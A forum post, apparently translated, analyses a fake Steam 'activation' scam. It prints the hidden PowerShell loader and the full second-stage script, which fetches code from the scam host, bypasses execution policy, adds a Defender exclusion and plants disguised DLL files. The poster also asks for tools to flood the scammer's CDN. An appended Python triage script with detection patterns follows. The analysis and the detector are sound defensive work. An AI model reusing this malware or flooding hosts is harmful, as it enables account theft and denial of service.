A pdd seller's fake "activation" asked me to enter this command
```
irm steam.*** | iex
```
I tried opening this steam site directly in a browser and it redirected straight to the real Steam, so that line of thinking was wrong. Then I removed the pipe symbol | and found that what it pulled down was still HTML, which seemed off, so I dumped everything returned by
```
irm steam.***
```
into vscode, folded the HTML, and found this
```
#>
irm steam.***/pwsDwFile/new -OutFile x.ps1
powershell.exe -ExecutionPolicy Bypass -File x.ps1;
<#
```
It uses powershell to bypass the execution policy restriction.
At first I didn't spot the problem here; I stared at the HTML for ages and was nearly going cross-eyed. Code can be obfuscated into HTML? Eventually I reasoned backwards: it must use powershell to run the next script, so I searched for the powershell keyword and it turned up those two lines above. The first one was actually hidden inside the HTML; the second wasn't hidden at all, and folding in vscode showed the powershell right away.
Continuing with x.ps1
```
cls
$filePathToDelete = Join-Path $env:USERPROFILE "x.ps1"
if (Test-Path $filePathToDelete) {
Remove-Item -Path $filePathToDelete
}
$desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "x.ps1"
if (Test-Path $desktopFilePathToDelete) {
Remove-Item -Path $desktopFilePathToDelete
}
```
It deletes itself
```
$steamRegPath = 'HKCU:\Software\Valve\Steam'
```
Looks up steam
```
$localPath = -join ($env:LOCALAPPDATA,"\SteamActive")
if ((Test-Path $steamRegPath)) {
$properties = Get-ItemProperty -Path $steamRegPath
if ($properties.PSObject.Properties.Name -contains 'SteamPath') {
$steamPath = $properties.SteamPath
}
}
```
Gets the user to turn off authorization
```
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
Write-Host "[请重新打开 Power shell 打开方式以管理员身份运行]" -ForegroundColor:red
exit
}
function PwStart() {
if(Get-Process "360Tray*" -ErrorAction Stop){
while(Get-Process 360Tray* -ErrorAction Stop){
Write-Host "[请先退出 360 安全卫士]" -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart
}
if(Get-Process "360sd*" -ErrorAction Stop)
{
while(Get-Process 360sd* -ErrorAction Stop){
Write-Host "[请先退出 360 杀毒]" -ForegroundColor:Red
Start-Sleep 1.5
}
PwStart
}
```
This line is odd; in practice the VM had no steam installed, so this didn't execute?
```
if ($steamPath -eq ""){
Write-Host "[请检查您的 Steam 是否正确安装]" -ForegroundColor:Red
exit
}
```
Kills steam
```
Write-Host "[SerferStart OK]" -ForegroundColor:green
Stop-Process -Name steam* -Force -ErrorAction Stop
Start-Sleep 2
if(Get-Process steam* -ErrorAction Stop){
TASKKILL /F /IM "steam.exe" | Out-Null
Start-Sleep 2
}
if (!(Test-Path $localPath)) {
md $localPath | Out-Null
if (!(Test-Path $localPath)) {
New-Item $localPath -ItemType directory -Force | Out-Null
}
}
$catchPath = -join ($steamPath,"\package\data")
if ((Test-Path $catchPath)) {
if ((Test-Path $catchPath)) {
Remove-Item $catchPath -Recurse -Force | Out-Null
}
}
```
Adds AV evasion
```
try{
Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop
Start-Sleep 3
}catch{}
Write-Host "[Result->0 OK]" -ForegroundColor:green
```
Deletes other groups' dlls?
```
try{
$d = $steamPath + "/fersion.dll"
if (Test-Path $d) {
Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null # remove the file
}
$d = $steamPath + "/user32.dll"
if (Test-Path $d) {
Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null # remove the file
}
$d = $steamPath + "/hid.dll"
if (Test-Path $d) {
Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null # remove the file
}
}catch{
Write-Host "[异常残留请检查[$d]文件是否异常!]" -ForegroundColor:red
exit
}
```
Downloads "pdf"s as a disguise? By the way, do you guys have any tools for hammering a network? I'm kind of tempted to hammer his CDN dry, but it's rate-limited to 2m and one thread per IP
```
$downloadData = "http://steam.***/pwsDwFile/bcfc1e52ca77ad82122dfe4c9560f3ec.pdf"
$downloadLink = "http://steam.***/pwsDwFile/9b96dab2bb0ba18d56068fabc5b17185.pdf"
irm -Uri $downloadLink -OutFile $d -ErrorAction Stop
Write-Host "[Result->1 OK]" -ForegroundColor:green
$d = $localPath + "/hid"
irm -Uri $downloadData -OutFile $d -ErrorAction Stop
Write-Host "[Result->2 OK]" -ForegroundColor:green
Start-Sleep 1
```
Reopens steam
```
Start steam://
Write-Host "[连接服务器成功请在 Steam 输入激活码 3 秒后自动关闭]" -ForegroundColor:green
Start-Sleep 3
exit
}
```
Looking at it overall, it just adds two files to steam, but it doesn't seem to do any injection or anything. My understanding is that when a dll is needed, the dll in the program's own directory is loaded and run first? That would be the only explanation for why it adds just two files?
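An added triage helper (my own, not from the post or from the scammer's script): it strips PowerShell `<# ... #>` block comments the way the parser does, so the two lines that `iex` actually runs fall out of the HTML wrapper described above, and then flags the indicators the post walks through later (`-OutFile` downloads, `-ExecutionPolicy Bypass`, `Add-MpPreference -ExclusionPath`, `Stop-Process`). Both embedded samples are constructed, and `steam.example` stands in for the redacted domain.

```python
import re

# Constructed stage-1 sample modelled on the post: HTML wrapped in PowerShell block
# comments, so "irm <url> | iex" only executes the two lines between "#>" and "<#".
# "steam.example" stands in for the redacted domain.
STAGE1 = """<#<!DOCTYPE html><html><head><title>Steam</title></head><body>
<div>fake activation page</div>
#>
irm steam.example/pwsDwFile/new -OutFile x.ps1
powershell.exe -ExecutionPolicy Bypass -File x.ps1;
<#
<p>footer</p></body></html>#>"""

# Constructed stage-2 sample echoing the x.ps1 behaviour walked through in the post.
STAGE2 = """Stop-Process -Name steam* -Force -ErrorAction Stop
Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop
irm -Uri $downloadLink -OutFile $d -ErrorAction Stop
Start steam://"""

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Indicator regexes are mine; each corresponds to a step the post shows.
INDICATORS = {
    "download-to-disk": re.compile(
        r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b.*-OutFile", re.I),
    "execution-policy-bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "defender-exclusion": re.compile(r"\bAdd-MpPreference\b.*-ExclusionPath", re.I),
    "kills-process": re.compile(r"\b(Stop-Process|TASKKILL)\b", re.I),
}

def strip_block_comments(text):
    """Keep only what PowerShell would execute: text outside <# ... #>.
    A <# that is never closed comments out the rest of the file, as the parser does."""
    text = BLOCK_COMMENT.sub("\n", text)
    unclosed = text.find("<#")
    return text if unclosed == -1 else text[:unclosed]

def executable_lines(text):
    """Non-empty, stripped lines that survive comment removal."""
    return [ln.strip() for ln in strip_block_comments(text).splitlines() if ln.strip()]

def triage(text):
    """Map indicator name -> executable lines matching it (empty dict = nothing seen)."""
    lines = executable_lines(text)
    return {name: [ln for ln in lines if rx.search(ln)]
            for name, rx in INDICATORS.items()
            if any(rx.search(ln) for ln in lines)}
```

Running `triage(STAGE1)` shows only the two executable lines being flagged, while the HTML that fooled a browser visit never reaches the indicator checks.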